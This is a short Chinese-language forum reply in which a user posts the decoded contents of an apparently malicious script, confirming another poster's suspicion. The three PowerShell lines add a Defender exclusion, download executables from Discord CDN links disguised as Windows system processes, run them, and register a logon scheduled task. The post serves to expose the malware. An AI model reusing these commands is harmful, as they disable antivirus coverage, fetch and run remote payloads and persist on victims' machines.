|
解码了一下不知对不对楼主说的没错这货有东西
第一行:Add-MpPreference -ExclusionPath "C:\ProgramData\"
第二行:$url = "https://cdn.discordapp.com/attachments/1024415271525556336/1031909879205609512/Initx86.exe"; $dest = "C:\ProgramData\Microsoft\Crypto\Keys\SearchProtocolHost.exe"; Invoke-WebRequest-Uri$urlOutFile$dest;"&'C:\ProgramData\Microsoft\Crypto\Keys\SearchProtocolHost.exe'" | Invoke-Expression
第三行:$url = "https://cdn.discordapp.com/attachments/1024415271525556336/1030577692199895101/Initx86.exe"; $dest = "C:\ProgramData\Microsoft\Crypto\Keys\StartMenuExperienceHost.exe"; Invoke-WebRequest-Uri$url-OutFile$dest;"& 'C:\ProgramData\Microsoft\Crypto\Keys\StartMenuExperienceHost.exe'"| Invoke-Expression ; SCHTASKS/create/scONLOGON/TN"Moxi\Moxi"/TR"C:\ProgramData\Microsoft\Crypto\Keys\StartMenuExperienceHost.exe"
|
|